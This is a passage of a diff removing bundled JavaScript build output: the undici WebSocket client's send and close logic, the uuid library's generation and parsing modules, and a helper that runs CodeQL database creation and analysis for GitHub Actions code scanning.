{import('stream').Duplex} */ - const socket = this[kResponse].socket - - socket.write(frame.createFrame(opcodes.CLOSE), (err) => { - if (!err) { - this[kSentClose] = true - } - }) - - // Upon either sending or receiving a Close control frame, it is said - // that _The WebSocket Closing Handshake is Started_ and that the - // WebSocket connection is in the CLOSING state. - this[kReadyState] = states.CLOSING - } else { - // Otherwise - // Set this's ready state to CLOSING (2). - this[kReadyState] = WebSocket.CLOSING - } - } - - /** - * @see https://websockets.spec.whatwg.org/#dom-websocket-send - * @param {NodeJS.TypedArray|ArrayBuffer|Blob|string} data - */ - send (data) { - webidl.brandCheck(this, WebSocket) - - webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket.send' }) - - data = webidl.converters.WebSocketSendData(data) - - // 1. If this's ready state is CONNECTING, then throw an - // "InvalidStateError" DOMException. - if (this[kReadyState] === WebSocket.CONNECTING) { - throw new DOMException('Sent before connected.', 'InvalidStateError') - } - - // 2. Run the appropriate set of steps from the following list: - // https://datatracker.ietf.org/doc/html/rfc6455#section-6.1 - // https://datatracker.ietf.org/doc/html/rfc6455#section-5.2 - - if (!isEstablished(this) || isClosing(this)) { - return - } - - /** @type {import('stream').Duplex} */ - const socket = this[kResponse].socket - - // If data is a string - if (typeof data === 'string') { - // If the WebSocket connection is established and the WebSocket - // closing handshake has not yet started, then the user agent - // must send a WebSocket Message comprised of the data argument - // using a text frame opcode; if the data cannot be sent, e.g. - // because it would need to be buffered but the buffer is full, - // the user agent must flag the WebSocket as full and then close - // the WebSocket connection. Any invocation of this method with a - // string argument that does not throw an exception must increase - // the bufferedAmount attribute by the number of bytes needed to - // express the argument as UTF-8. - - const value = Buffer.from(data) - const frame = new WebsocketFrameSend(value) - const buffer = frame.createFrame(opcodes.TEXT) - - this.#bufferedAmount += value.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= value.byteLength - }) - } else if (types.isArrayBuffer(data)) { - // If the WebSocket connection is established, and the WebSocket - // closing handshake has not yet started, then the user agent must - // send a WebSocket Message comprised of data using a binary frame - // opcode; if the data cannot be sent, e.g. because it would need - // to be buffered but the buffer is full, the user agent must flag - // the WebSocket as full and then close the WebSocket connection. - // The data to be sent is the data stored in the buffer described - // by the ArrayBuffer object. Any invocation of this method with an - // ArrayBuffer argument that does not throw an exception must - // increase the bufferedAmount attribute by the length of the - // ArrayBuffer in bytes. - - const value = Buffer.from(data) - const frame = new WebsocketFrameSend(value) - const buffer = frame.createFrame(opcodes.BINARY) - - this.#bufferedAmount += value.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= value.byteLength - }) - } else if (ArrayBuffer.isView(data)) { - // If the WebSocket connection is established, and the WebSocket - // closing handshake has not yet started, then the user agent must - // send a WebSocket Message comprised of data using a binary frame - // opcode; if the data cannot be sent, e.g. because it would need to - // be buffered but the buffer is full, the user agent must flag the - // WebSocket as full and then close the WebSocket connection. The - // data to be sent is the data stored in the section of the buffer - // described by the ArrayBuffer object that data references. Any - // invocation of this method with this kind of argument that does - // not throw an exception must increase the bufferedAmount attribute - // by the length of data’s buffer in bytes. - - const ab = Buffer.from(data, data.byteOffset, data.byteLength) - - const frame = new WebsocketFrameSend(ab) - const buffer = frame.createFrame(opcodes.BINARY) - - this.#bufferedAmount += ab.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= ab.byteLength - }) - } else if (isBlobLike(data)) { - // If the WebSocket connection is established, and the WebSocket - // closing handshake has not yet started, then the user agent must - // send a WebSocket Message comprised of data using a binary frame - // opcode; if the data cannot be sent, e.g. because it would need to - // be buffered but the buffer is full, the user agent must flag the - // WebSocket as full and then close the WebSocket connection. The data - // to be sent is the raw data represented by the Blob object. Any - // invocation of this method with a Blob argument that does not throw - // an exception must increase the bufferedAmount attribute by the size - // of the Blob object’s raw data, in bytes. - - const frame = new WebsocketFrameSend() - - data.arrayBuffer().then((ab) => { - const value = Buffer.from(ab) - frame.frameData = value - const buffer = frame.createFrame(opcodes.BINARY) - - this.#bufferedAmount += value.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= value.byteLength - }) - }) - } - } - - get readyState () { - webidl.brandCheck(this, WebSocket) - - // The readyState getter steps are to return this's ready state. - return this[kReadyState] - } - - get bufferedAmount () { - webidl.brandCheck(this, WebSocket) - - return this.#bufferedAmount - } - - get url () { - webidl.brandCheck(this, WebSocket) - - // The url getter steps are to return this's url, serialized. - return URLSerializer(this[kWebSocketURL]) - } - - get extensions () { - webidl.brandCheck(this, WebSocket) - - return this.#extensions - } - - get protocol () { - webidl.brandCheck(this, WebSocket) - - return this.#protocol - } - - get onopen () { - webidl.brandCheck(this, WebSocket) - - return this.#events.open - } - - set onopen (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.open) { - this.removeEventListener('open', this.#events.open) - } - - if (typeof fn === 'function') { - this.#events.open = fn - this.addEventListener('open', fn) - } else { - this.#events.open = null - } - } - - get onerror () { - webidl.brandCheck(this, WebSocket) - - return this.#events.error - } - - set onerror (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.error) { - this.removeEventListener('error', this.#events.error) - } - - if (typeof fn === 'function') { - this.#events.error = fn - this.addEventListener('error', fn) - } else { - this.#events.error = null - } - } - - get onclose () { - webidl.brandCheck(this, WebSocket) - - return this.#events.close - } - - set onclose (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.close) { - this.removeEventListener('close', this.#events.close) - } - - if (typeof fn === 'function') { - this.#events.close = fn - this.addEventListener('close', fn) - } else { - this.#events.close = null - } - } - - get onmessage () { - webidl.brandCheck(this, WebSocket) - - return this.#events.message - } - - set onmessage (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.message) { - this.removeEventListener('message', this.#events.message) - } - - if (typeof fn === 'function') { - this.#events.message = fn - this.addEventListener('message', fn) - } else { - this.#events.message = null - } - } - - get binaryType () { - webidl.brandCheck(this, WebSocket) - - return this[kBinaryType] - } - - set binaryType (type) { - webidl.brandCheck(this, WebSocket) - - if (type !== 'blob' && type !== 'arraybuffer') { - this[kBinaryType] = 'blob' - } else { - this[kBinaryType] = type - } - } - - /** - * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol - */ - #onConnectionEstablished (response) { - // processResponse is called when the "response’s header list has been received and initialized." - // once this happens, the connection is open - this[kResponse] = response - - const parser = new ByteParser(this) - parser.on('drain', function onParserDrain () { - this.ws[kResponse].socket.resume() - }) - - response.socket.ws = this - this[kByteParser] = parser - - // 1. Change the ready state to OPEN (1). - this[kReadyState] = states.OPEN - - // 2. Change the extensions attribute’s value to the extensions in use, if - // it is not the null value. - // https://datatracker.ietf.org/doc/html/rfc6455#section-9.1 - const extensions = response.headersList.get('sec-websocket-extensions') - - if (extensions !== null) { - this.#extensions = extensions - } - - // 3. Change the protocol attribute’s value to the subprotocol in use, if - // it is not the null value. - // https://datatracker.ietf.org/doc/html/rfc6455#section-1.9 - const protocol = response.headersList.get('sec-websocket-protocol') - - if (protocol !== null) { - this.#protocol = protocol - } - - // 4. Fire an event named open at the WebSocket object. - fireEvent('open', this) - } -} - -// https://websockets.spec.whatwg.org/#dom-websocket-connecting -WebSocket.CONNECTING = WebSocket.prototype.CONNECTING = states.CONNECTING -// https://websockets.spec.whatwg.org/#dom-websocket-open -WebSocket.OPEN = WebSocket.prototype.OPEN = states.OPEN -// https://websockets.spec.whatwg.org/#dom-websocket-closing -WebSocket.CLOSING = WebSocket.prototype.CLOSING = states.CLOSING -// https://websockets.spec.whatwg.org/#dom-websocket-closed -WebSocket.CLOSED = WebSocket.prototype.CLOSED = states.CLOSED - -Object.defineProperties(WebSocket.prototype, { - CONNECTING: staticPropertyDescriptors, - OPEN: staticPropertyDescriptors, - CLOSING: staticPropertyDescriptors, - CLOSED: staticPropertyDescriptors, - url: kEnumerableProperty, - readyState: kEnumerableProperty, - bufferedAmount: kEnumerableProperty, - onopen: kEnumerableProperty, - onerror: kEnumerableProperty, - onclose: kEnumerableProperty, - close: kEnumerableProperty, - onmessage: kEnumerableProperty, - binaryType: kEnumerableProperty, - send: kEnumerableProperty, - extensions: kEnumerableProperty, - protocol: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'WebSocket', - writable: false, - enumerable: false, - configurable: true - } -}) - -Object.defineProperties(WebSocket, { - CONNECTING: staticPropertyDescriptors, - OPEN: staticPropertyDescriptors, - CLOSING: staticPropertyDescriptors, - CLOSED: staticPropertyDescriptors -}) - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.DOMString -) - -webidl.converters['DOMString or sequence'] = function (V) { - if (webidl.util.Type(V) === 'Object' && Symbol.iterator in V) { - return webidl.converters['sequence'](V) - } - - return webidl.converters.DOMString(V) -} - -// This implements the propsal made in https://github.com/whatwg/websockets/issues/42 -webidl.converters.WebSocketInit = webidl.dictionaryConverter([ - { - key: 'protocols', - converter: webidl.converters['DOMString or sequence'], - get defaultValue () { - return [] - } - }, - { - key: 'dispatcher', - converter: (V) => V, - get defaultValue () { - return getGlobalDispatcher() - } - }, - { - key: 'headers', - converter: webidl.nullableConverter(webidl.converters.HeadersInit) - } -]) - -webidl.converters['DOMString or sequence or WebSocketInit'] = function (V) { - if (webidl.util.Type(V) === 'Object' && !(Symbol.iterator in V)) { - return webidl.converters.WebSocketInit(V) - } - - return { protocols: webidl.converters['DOMString or sequence'](V) } -} - -webidl.converters.WebSocketSendData = function (V) { - if (webidl.util.Type(V) === 'Object') { - if (isBlobLike(V)) { - return webidl.converters.Blob(V, { strict: false }) - } - - if (ArrayBuffer.isView(V) || types.isAnyArrayBuffer(V)) { - return webidl.converters.BufferSource(V) - } - } - - return webidl.converters.USVString(V) -} - -module.exports = { - WebSocket -} - - -/***/ }), - -/***/ 5840: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -Object.defineProperty(exports, "v1", ({ - enumerable: true, - get: function () { - return _v.default; - } -})); -Object.defineProperty(exports, "v3", ({ - enumerable: true, - get: function () { - return _v2.default; - } -})); -Object.defineProperty(exports, "v4", ({ - enumerable: true, - get: function () { - return _v3.default; - } -})); -Object.defineProperty(exports, "v5", ({ - enumerable: true, - get: function () { - return _v4.default; - } -})); -Object.defineProperty(exports, "NIL", ({ - enumerable: true, - get: function () { - return _nil.default; - } -})); -Object.defineProperty(exports, "version", ({ - enumerable: true, - get: function () { - return _version.default; - } -})); -Object.defineProperty(exports, "validate", ({ - enumerable: true, - get: function () { - return _validate.default; - } -})); -Object.defineProperty(exports, "stringify", ({ - enumerable: true, - get: function () { - return _stringify.default; - } -})); -Object.defineProperty(exports, "parse", ({ - enumerable: true, - get: function () { - return _parse.default; - } -})); - -var _v = _interopRequireDefault(__nccwpck_require__(8628)); - -var _v2 = _interopRequireDefault(__nccwpck_require__(6409)); - -var _v3 = _interopRequireDefault(__nccwpck_require__(5122)); - -var _v4 = _interopRequireDefault(__nccwpck_require__(9120)); - -var _nil = _interopRequireDefault(__nccwpck_require__(5332)); - -var _version = _interopRequireDefault(__nccwpck_require__(1595)); - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -var _parse = _interopRequireDefault(__nccwpck_require__(2746)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -/***/ }), - -/***/ 4569: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function md5(bytes) { - if (Array.isArray(bytes)) { - bytes = Buffer.from(bytes); - } else if (typeof bytes === 'string') { - bytes = Buffer.from(bytes, 'utf8'); - } - - return _crypto.default.createHash('md5').update(bytes).digest(); -} - -var _default = md5; -exports["default"] = _default; - -/***/ }), - -/***/ 5332: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; -var _default = '00000000-0000-0000-0000-000000000000'; -exports["default"] = _default; - -/***/ }), - -/***/ 2746: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function parse(uuid) { - if (!(0, _validate.default)(uuid)) { - throw TypeError('Invalid UUID'); - } - - let v; - const arr = new Uint8Array(16); // Parse ########-....-....-....-............ - - arr[0] = (v = parseInt(uuid.slice(0, 8), 16)) >>> 24; - arr[1] = v >>> 16 & 0xff; - arr[2] = v >>> 8 & 0xff; - arr[3] = v & 0xff; // Parse ........-####-....-....-............ - - arr[4] = (v = parseInt(uuid.slice(9, 13), 16)) >>> 8; - arr[5] = v & 0xff; // Parse ........-....-####-....-............ - - arr[6] = (v = parseInt(uuid.slice(14, 18), 16)) >>> 8; - arr[7] = v & 0xff; // Parse ........-....-....-####-............ - - arr[8] = (v = parseInt(uuid.slice(19, 23), 16)) >>> 8; - arr[9] = v & 0xff; // Parse ........-....-....-....-############ - // (Use "/" to avoid 32-bit truncation when bit-shifting high-order bytes) - - arr[10] = (v = parseInt(uuid.slice(24, 36), 16)) / 0x10000000000 & 0xff; - arr[11] = v / 0x100000000 & 0xff; - arr[12] = v >>> 24 & 0xff; - arr[13] = v >>> 16 & 0xff; - arr[14] = v >>> 8 & 0xff; - arr[15] = v & 0xff; - return arr; -} - -var _default = parse; -exports["default"] = _default; - -/***/ }), - -/***/ 814: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; -var _default = /^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i; -exports["default"] = _default; - -/***/ }), - -/***/ 807: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = rng; - -var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -const rnds8Pool = new Uint8Array(256); // # of random values to pre-allocate - -let poolPtr = rnds8Pool.length; - -function rng() { - if (poolPtr > rnds8Pool.length - 16) { - _crypto.default.randomFillSync(rnds8Pool); - - poolPtr = 0; - } - - return rnds8Pool.slice(poolPtr, poolPtr += 16); -} - -/***/ }), - -/***/ 5274: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function sha1(bytes) { - if (Array.isArray(bytes)) { - bytes = Buffer.from(bytes); - } else if (typeof bytes === 'string') { - bytes = Buffer.from(bytes, 'utf8'); - } - - return _crypto.default.createHash('sha1').update(bytes).digest(); -} - -var _default = sha1; -exports["default"] = _default; - -/***/ }), - -/***/ 8950: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -/** - * Convert array of 16 byte values to UUID string format of the form: - * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX - */ -const byteToHex = []; - -for (let i = 0; i < 256; ++i) { - byteToHex.push((i + 0x100).toString(16).substr(1)); -} - -function stringify(arr, offset = 0) { - // Note: Be careful editing this code! It's been tuned for performance - // and works in ways you may not expect. See https://github.com/uuidjs/uuid/pull/434 - const uuid = (byteToHex[arr[offset + 0]] + byteToHex[arr[offset + 1]] + byteToHex[arr[offset + 2]] + byteToHex[arr[offset + 3]] + '-' + byteToHex[arr[offset + 4]] + byteToHex[arr[offset + 5]] + '-' + byteToHex[arr[offset + 6]] + byteToHex[arr[offset + 7]] + '-' + byteToHex[arr[offset + 8]] + byteToHex[arr[offset + 9]] + '-' + byteToHex[arr[offset + 10]] + byteToHex[arr[offset + 11]] + byteToHex[arr[offset + 12]] + byteToHex[arr[offset + 13]] + byteToHex[arr[offset + 14]] + byteToHex[arr[offset + 15]]).toLowerCase(); // Consistency check for valid UUID. If this throws, it's likely due to one - // of the following: - // - One or more input array values don't map to a hex octet (leading to - // "undefined" in the uuid) - // - Invalid input values for the RFC `version` or `variant` fields - - if (!(0, _validate.default)(uuid)) { - throw TypeError('Stringified UUID is invalid'); - } - - return uuid; -} - -var _default = stringify; -exports["default"] = _default; - -/***/ }), - -/***/ 8628: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _rng = _interopRequireDefault(__nccwpck_require__(807)); - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -// **`v1()` - Generate time-based UUID** -// -// Inspired by https://github.com/LiosK/UUID.js -// and http://docs.python.org/library/uuid.html -let _nodeId; - -let _clockseq; // Previous uuid creation time - - -let _lastMSecs = 0; -let _lastNSecs = 0; // See https://github.com/uuidjs/uuid for API details - -function v1(options, buf, offset) { - let i = buf && offset || 0; - const b = buf || new Array(16); - options = options || {}; - let node = options.node || _nodeId; - let clockseq = options.clockseq !== undefined ? options.clockseq : _clockseq; // node and clockseq need to be initialized to random values if they're not - // specified. We do this lazily to minimize issues related to insufficient - // system entropy. See #189 - - if (node == null || clockseq == null) { - const seedBytes = options.random || (options.rng || _rng.default)(); - - if (node == null) { - // Per 4.5, create and 48-bit node id, (47 random bits + multicast bit = 1) - node = _nodeId = [seedBytes[0] | 0x01, seedBytes[1], seedBytes[2], seedBytes[3], seedBytes[4], seedBytes[5]]; - } - - if (clockseq == null) { - // Per 4.2.2, randomize (14 bit) clockseq - clockseq = _clockseq = (seedBytes[6] << 8 | seedBytes[7]) & 0x3fff; - } - } // UUID timestamps are 100 nano-second units since the Gregorian epoch, - // (1582-10-15 00:00). JSNumbers aren't precise enough for this, so - // time is handled internally as 'msecs' (integer milliseconds) and 'nsecs' - // (100-nanoseconds offset from msecs) since unix epoch, 1970-01-01 00:00. - - - let msecs = options.msecs !== undefined ? options.msecs : Date.now(); // Per 4.2.1.2, use count of uuid's generated during the current clock - // cycle to simulate higher resolution clock - - let nsecs = options.nsecs !== undefined ? options.nsecs : _lastNSecs + 1; // Time since last uuid creation (in msecs) - - const dt = msecs - _lastMSecs + (nsecs - _lastNSecs) / 10000; // Per 4.2.1.2, Bump clockseq on clock regression - - if (dt < 0 && options.clockseq === undefined) { - clockseq = clockseq + 1 & 0x3fff; - } // Reset nsecs if clock regresses (new clockseq) or we've moved onto a new - // time interval - - - if ((dt < 0 || msecs > _lastMSecs) && options.nsecs === undefined) { - nsecs = 0; - } // Per 4.2.1.2 Throw error if too many uuids are requested - - - if (nsecs >= 10000) { - throw new Error("uuid.v1(): Can't create more than 10M uuids/sec"); - } - - _lastMSecs = msecs; - _lastNSecs = nsecs; - _clockseq = clockseq; // Per 4.1.4 - Convert from unix epoch to Gregorian epoch - - msecs += 12219292800000; // `time_low` - - const tl = ((msecs & 0xfffffff) * 10000 + nsecs) % 0x100000000; - b[i++] = tl >>> 24 & 0xff; - b[i++] = tl >>> 16 & 0xff; - b[i++] = tl >>> 8 & 0xff; - b[i++] = tl & 0xff; // `time_mid` - - const tmh = msecs / 0x100000000 * 10000 & 0xfffffff; - b[i++] = tmh >>> 8 & 0xff; - b[i++] = tmh & 0xff; // `time_high_and_version` - - b[i++] = tmh >>> 24 & 0xf | 0x10; // include version - - b[i++] = tmh >>> 16 & 0xff; // `clock_seq_hi_and_reserved` (Per 4.2.2 - include variant) - - b[i++] = clockseq >>> 8 | 0x80; // `clock_seq_low` - - b[i++] = clockseq & 0xff; // `node` - - for (let n = 0; n < 6; ++n) { - b[i + n] = node[n]; - } - - return buf || (0, _stringify.default)(b); -} - -var _default = v1; -exports["default"] = _default; - -/***/ }), - -/***/ 6409: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _v = _interopRequireDefault(__nccwpck_require__(5998)); - -var _md = _interopRequireDefault(__nccwpck_require__(4569)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -const v3 = (0, _v.default)('v3', 0x30, _md.default); -var _default = v3; -exports["default"] = _default; - -/***/ }), - -/***/ 5998: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = _default; -exports.URL = exports.DNS = void 0; - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -var _parse = _interopRequireDefault(__nccwpck_require__(2746)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function stringToBytes(str) { - str = unescape(encodeURIComponent(str)); // UTF8 escape - - const bytes = []; - - for (let i = 0; i < str.length; ++i) { - bytes.push(str.charCodeAt(i)); - } - - return bytes; -} - -const DNS = '6ba7b810-9dad-11d1-80b4-00c04fd430c8'; -exports.DNS = DNS; -const URL = '6ba7b811-9dad-11d1-80b4-00c04fd430c8'; -exports.URL = URL; - -function _default(name, version, hashfunc) { - function generateUUID(value, namespace, buf, offset) { - if (typeof value === 'string') { - value = stringToBytes(value); - } - - if (typeof namespace === 'string') { - namespace = (0, _parse.default)(namespace); - } - - if (namespace.length !== 16) { - throw TypeError('Namespace must be array-like (16 iterable integer values, 0-255)'); - } // Compute hash of namespace and value, Per 4.3 - // Future: Use spread syntax when supported on all platforms, e.g. `bytes = - // hashfunc([...namespace, ... value])` - - - let bytes = new Uint8Array(16 + value.length); - bytes.set(namespace); - bytes.set(value, namespace.length); - bytes = hashfunc(bytes); - bytes[6] = bytes[6] & 0x0f | version; - bytes[8] = bytes[8] & 0x3f | 0x80; - - if (buf) { - offset = offset || 0; - - for (let i = 0; i < 16; ++i) { - buf[offset + i] = bytes[i]; - } - - return buf; - } - - return (0, _stringify.default)(bytes); - } // Function#name is not settable on some platforms (#270) - - - try { - generateUUID.name = name; // eslint-disable-next-line no-empty - } catch (err) {} // For CommonJS default export support - - - generateUUID.DNS = DNS; - generateUUID.URL = URL; - return generateUUID; -} - -/***/ }), - -/***/ 5122: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _rng = _interopRequireDefault(__nccwpck_require__(807)); - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function v4(options, buf, offset) { - options = options || {}; - - const rnds = options.random || (options.rng || _rng.default)(); // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` - - - rnds[6] = rnds[6] & 0x0f | 0x40; - rnds[8] = rnds[8] & 0x3f | 0x80; // Copy bytes to buffer, if provided - - if (buf) { - offset = offset || 0; - - for (let i = 0; i < 16; ++i) { - buf[offset + i] = rnds[i]; - } - - return buf; - } - - return (0, _stringify.default)(rnds); -} - -var _default = v4; -exports["default"] = _default; - -/***/ }), - -/***/ 9120: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _v = _interopRequireDefault(__nccwpck_require__(5998)); - -var _sha = _interopRequireDefault(__nccwpck_require__(5274)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -const v5 = (0, _v.default)('v5', 0x50, _sha.default); -var _default = v5; -exports["default"] = _default; - -/***/ }), - -/***/ 6900: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _regex = _interopRequireDefault(__nccwpck_require__(814)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function validate(uuid) { - return typeof uuid === 'string' && _regex.default.test(uuid); -} - -var _default = validate; -exports["default"] = _default; - -/***/ }), - -/***/ 1595: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function version(uuid) { - if (!(0, _validate.default)(uuid)) { - throw TypeError('Invalid UUID'); - } - - return parseInt(uuid.substr(14, 1), 16); -} - -var _default = version; -exports["default"] = _default; - -/***/ }), - -/***/ 950: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; -const fs = __importStar(__nccwpck_require__(7147)); -const path = __importStar(__nccwpck_require__(1017)); -const core = __importStar(__nccwpck_require__(2186)); -const toolcache = __importStar(__nccwpck_require__(7784)); -const toolrunner = __importStar(__nccwpck_require__(8159)); -async function newCodeQL() { - return { - language: "javascript", - path: await findCodeQL(), - pack: "github/actions-queries", - suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, - source_root: core.getInput("source-root"), - output: core.getInput("sarif"), - packs: core.getInput("packs").length > 0 ? core.getInput("packs") : undefined, - }; -} -exports.newCodeQL = newCodeQL; -async function runCommand(config, args, cwd_arg) { - var bin = path.join(config.path, "codeql"); - let output = ""; - var cwd = process.cwd(); - if (cwd_arg) { - cwd = cwd_arg; - } - core.info("Current working directory: " + cwd); - var options = { - cwd: cwd, - listeners: { - stdout: (data) => { - output += data.toString(); - }, - }, - }; - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - return output.trim(); -} -exports.runCommand = runCommand; -async function runCommandJson(config, args) { - return JSON.parse(await runCommand(config, args)); -} -exports.runCommandJson = runCommandJson; -async function findCodeQL() { - // check if codeql is in the toolcache - var codeqlPath = await findCodeQlInToolcache(); - if (codeqlPath !== undefined) { - return codeqlPath; - } - // default to the codeql in the path - return "codeql"; -} -async function findCodeQlInToolcache() { - const candidates = toolcache - .findAllVersions("CodeQL") - .map((version) => ({ - folder: toolcache.find("CodeQL", version), - version, - })) - .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); - if (candidates.length === 1) { - const candidate = candidates[0]; - core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); - core.debug(`CodeQL toolcache version: '${candidate.version}'.`); - return path.join(candidate.folder, "codeql"); - } - core.warning(`No CodeQL tools found in toolcache.`); - return undefined; -} -async function downloadPack(codeql) { - try { - await runCommand(codeql, ["pack", "download", codeql.pack]); - return true; - } - catch (error) { - core.warning("Failed to download pack from GitHub..."); - } - return false; -} -exports.downloadPack = downloadPack; -async function codeqlDatabaseCreate(codeql) { - // get runner temp directory for database - var temp = process.env["RUNNER_TEMP"]; - if (temp === undefined) { - temp = "/tmp"; - } - var database_path = path.join(temp, "codeql-actions-db"); - var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - await runCommand(codeql, [ - "database", - "create", - "--language", - codeql.language, - "--source-root", - source_root, - database_path, - ]); - return database_path; -} -exports.codeqlDatabaseCreate = codeqlDatabaseCreate; -async function codeqlDatabaseAnalyze(codeql, database_path) { - var codeql_output = codeql.output || "codeql-actions.sarif"; - var cmd = [ - "database", - "analyze", - "--format", - "sarif-latest", - "--sarif-add-query-help", - "--output", - codeql_output, - ]; - if (codeql.packs !== undefined) { - cmd.push("--extension-packs", codeql.packs); - } - // remote pack or local pack - if (codeql.pack.startsWith("githubsecuritylab/")) { - var suite = codeql.pack + ":" + codeql.suite; - } - else { - // assume path - var suite = path.join(codeql.pack, codeql.suite); - cmd.push("--search-path", codeql.pack); - } - cmd.push(database_path, suite); - await runCommand(codeql, cmd); - return codeql_output; -} -exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; - - -/***/ }), - -/***/ 6144: -/***/ (function(__unused_webpack_module, 